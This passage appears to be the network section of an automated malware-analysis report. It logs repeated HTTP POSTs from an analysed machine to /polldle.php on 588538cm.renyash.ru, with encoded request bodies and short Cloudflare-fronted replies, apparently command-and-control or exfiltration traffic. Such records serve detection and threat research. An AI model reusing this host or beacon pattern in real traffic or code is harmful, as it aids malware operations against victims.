                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 33 24 38 11 28 2a 34 00 2e 38 3f 5a 2d 57 24 59 3e 21 04 5e 37 39 38 5c 31 1c 2f 0b 2b 03 39 40 2b 04 30 0c 34 3d 2a 54 25 03 23 46 0c 1d 21 05 3f 2c 3f 0f 25 3f 24 10 3c 23 35 02 27 22 0a 44 3e 24 3f 55 3d 04 25 5c 22 3c 04 52 28 32 3d 56 3e 25 25 03 2c 31 38 02 26 00 2e 51 0f 16 22 0f 21 0f 2c 58 20 13 15 15 26 0e 28 00 2b 0a 02 5c 24 2a 01 08 28 20 3a 1d 2a 31 3c 56 26 2e 3c 08 26 11 3e 17 3f 29 02 08 29 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-3$8(*4.8?Z-W$Y>!^798\1/+9@+04=*T%#F!?,?%?$<#5'"D>$?U=%\"<R(2=V>%%,18&.Q"!,X &(+\$*( :*1<V&.<&>?));$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                125192.168.2.450133104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:29.572412968 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:29.926831961 CET2504OUTData Raw: 58 58 54 50 5a 43 5a 5e 54 5d 55 5a 50 54 59 5a 50 5d 5a 5f 57 56 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTPZCZ^T]UZPTYZP]Z_WVPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU . 6C%\2)%/. /5X8+7(Y720&.$^"+5#X'/\/
                                                                                Jan 11, 2025 23:34:30.034450054 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:30.271336079 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5O30KN%2FJCGRV7FCrDnENTapUXsHJSCEoeNCjS6N%2BsCooNHAguRW63y7kNIWGmE5xKXDzbgHI3euzIRFP34Jqp8LKIstPN5lbkG0PLDcirx9Q%2BjjqNX1NE3v9UDuiKPAZGZ1pkPS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe168b70f43-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7681&min_rtt=1554&rtt_var=12837&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28870&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                126192.168.2.450134104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:30.431314945 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:30.786256075 CET2504OUTData Raw: 5d 5c 54 56 5f 46 5f 5a 54 5d 55 5a 50 5a 59 5e 50 5c 5a 5e 57 52 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\TV_F_ZT]UZPZY^P\Z^WRPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#, 6A$(%!0/9 :-++(?W&U:T-'5,(%#X'/\/<
                                                                                Jan 11, 2025 23:34:30.876405001 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:31.156542063 CET813INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d4eSjwCTkk4EYi56xQQ7zpI1qHpFJ%2FpuJH2slLD%2F2Px3Cii%2BSd2rPg3v6jt8%2BhpKH1TNjG1cX7qAT9nj%2Bff%2BE7SJHUWiiH17gPtUQP8v26M0z8UjaxKvSJgD7StiDtfY%2F1jwCUe"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe6bb8532c7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2047&rtt_var=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=349784&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                127192.168.2.450135104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:31.328114986 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:31.676799059 CET2504OUTData Raw: 58 51 51 57 5f 46 5a 58 54 5d 55 5a 50 5f 59 5c 50 51 5a 52 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQW_FZXT]UZP_Y\PQZRWUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:11'&1)]$<)7,+Y?'&#"U,$!0?#X'/\/(
                                                                                Jan 11, 2025 23:34:31.789762974 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:32.017743111 CET813INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5GwETfz0FZWjvKbnmVNeFIBJZm0RTreUT%2BA9Cm6qaN%2Fo%2F2besnP1c3N1RPyZu2j7oOaZYf1wcuF%2FcX9YiFdA7g3BRafKllWTrBhDxU9z8Vx5JIZjyQ%2FDMfxoFlT%2FupN0BBeCbd%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fec69c4de97-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3054&min_rtt=1509&rtt_var=3656&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=105270&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                128192.168.2.450136104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:32.162045956 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:32.520982981 CET2504OUTData Raw: 5d 5d 54 55 5a 48 5f 5a 54 5d 55 5a 50 5a 59 5d 50 50 5a 53 57 53 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TUZH_ZT]UZPZY]PPZSWSP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .#2 $!!X0"<8;+(209:' !/?#X'/\/<
                                                                                Jan 11, 2025 23:34:32.623869896 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:32.780324936 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEQ%2ByLag1NhbbWAX5ZwpfGMVBD7lfmzRZZ%2BvXovWh8Iy4syDsAhEvuOdUb9wjPuKvw8r%2BfFX5u7cW3OzyKBYvXVLpjQBguZTVtBMBCLB6qeAB2GPaLnWsJnAiyyc1UMeJ5ww8%2BNG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ff1af0543b9-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4391&min_rtt=1893&rtt_var=5707&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=66715&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                129192.168.2.450137104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:32.923727036 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:33.270471096 CET2504OUTData Raw: 5d 5b 51 50 5f 41 5f 5a 54 5d 55 5a 50 58 59 5e 50 53 5a 5e 57 55 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QP_A_ZT]UZPXY^PSZ^WUP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@,0%&8[%>%/)W /9_-8#X(?%&V,4'!$+%#X'/\/4
                                                                                Jan 11, 2025 23:34:33.370318890 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:33.546621084 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIfhxONe181y3xzYjSp3wx8BGgY09TNaZwoRRFMzoqB9GiqGU%2F5inSVLXoFopgo9tEk6jVI2ZLs889lAGYMmftFo%2BxnQUfEIJVThCbg4ISQ4Ph8bAnQrEcPyzAEi6zJMRy0Da0fU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ff648c218b8-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4224&min_rtt=1490&rtt_var=6027&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62491&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                130192.168.2.450138104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:33.685380936 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:34.036391020 CET2504OUTData Raw: 58 5a 54 50 5a 47 5a 5e 54 5d 55 5a 50 58 59 5e 50 57 5a 5c 57 54 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTPZGZ^T]UZPXY^PWZ\WTPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -32(Y1"=]0<-V4<,?Y(/%3-0#2<#X'/\/4
                                                                                Jan 11, 2025 23:34:34.149949074 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:34.400146961 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZzLvaO4S6s3AEafEwmZUV5qPYEtQ4fl0A1VkhYs8t1WI%2F5HIQShj7CRFTyV3H2OXpkqv4jTwf%2FrufR4dgxcU3a5oA9Ti03LiwAIUhty63T7bcxs1QO0RWefLMEp5sxXRud4EArv"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ffb2dcac35b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3257&min_rtt=1760&rtt_var=3655&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=106243&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                131192.168.2.450139104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:34.555898905 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:34.911166906 CET2504OUTData Raw: 58 5b 54 5e 5a 43 5a 5e 54 5d 55 5a 50 58 59 58 50 57 5a 5d 57 57 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[T^ZCZ^T]UZPXYXPWZ]WWP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,39%80]&193<: ?:;?[+%05:'$Z#2+#X'/\/4
                                                                                Jan 11, 2025 23:34:35.020275116 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                132192.168.2.450140104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:35.104732990 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:35.457994938 CET1620OUTData Raw: 58 5d 54 57 5f 41 5f 58 54 5d 55 5a 50 5d 59 5a 50 5c 5a 58 57 54 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TW_A_XT]UZP]YZP\ZXWTPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C:0:10&"%%<* Z!;<(,?%0:.'#"!$(#X'/\/
                                                                                Jan 11, 2025 23:34:35.548927069 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:35.820617914 CET956INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HW7VMxc3%2FLd6pH%2FyukMurq9Ob7s4FK27LYknXTqxd1JYNSqs2f3gZrQZ%2FEnA3Bh%2F0W%2B9qEzAcAZcTcvm0Htr7wPoNY4DWiCy8nwPTuUZRfIV1ym3immdKY%2FVKlP8O6vaje7%2Fc81D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086003efca80d6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1516&rtt_var=952&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=478531&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 52 33 37 23 03 2a 39 01 10 3a 38 3b 1f 2e 31 0e 5b 29 21 26 5d 37 3a 37 01 25 0c 20 52 3f 14 0c 1b 3f 03 37 1d 22 3d 3d 0d 31 39 23 46 0c 1d 21 00 2a 2f 0e 52 27 3c 0a 58 3c 20 21 01 27 32 20 45 29 1a 3f 55 3d 2a 39 5d 22 02 26 18 2b 31 21 18 3d 1c 3d 02 2f 0f 30 02 32 00 2e 51 0f 16 21 50 21 22 3b 05 37 3d 1e 05 25 0e 3c 03 2b 0a 01 00 25 03 20 51 3c 55 21 00 2b 1c 02 1c 27 3d 0e 0f 25 59 22 16 3e 2a 2f 1a 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a
                                                                                Data Ascii: 98.R37#*9:8;.1[)!&]7:7% R??7"==19#F!*/R'<X< !'2 E)?U=*9]"&+1!==/02.Q!P!";7=%<+% Q<U!+'=%Y">*/?;$\#(V?[M
                                                                                Jan 11, 2025 23:34:35.907345057 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                133192.168.2.450141104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:35.248857975 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:35.598599911 CET2500OUTData Raw: 58 50 51 57 5a 40 5f 5f 54 5d 55 5a 50 5c 59 5a 50 55 5a 5b 57 51 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPQWZ@__T]UZP\YZPUZ[WQPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C:3.1+,[125_'!4!8;'(&:W.(Z628?5#X'/\/,
                                                                                Jan 11, 2025 23:34:35.690952063 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:35.924890995 CET800INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=se4zWhcf1TnzVqkkLgxitqTiZ4Vxqj0RqDtjzvg5sKGTlXcmqsASkS5lcjrDhyDrfwcD5yWKc7OwMUvdOtxK6Jm4LdOCKl4VCKtqTi0a%2BTMdf8yULbBEiIVxs98occyLYMkhvy6Y"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086004de2b42cf-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3357&min_rtt=1684&rtt_var=3979&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96855&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                134192.168.2.450142104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:36.054343939 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:36.411173105 CET2504OUTData Raw: 58 5c 54 54 5a 48 5f 5b 54 5d 55 5a 50 58 59 59 50 53 5a 53 57 50 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TTZH_[T]UZPXYYPSZSWPPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U%2^,[2*$V 1Z,$<</V1#19'?!2]+%#X'/\/4
                                                                                Jan 11, 2025 23:34:36.497936010 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:36.739346027 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
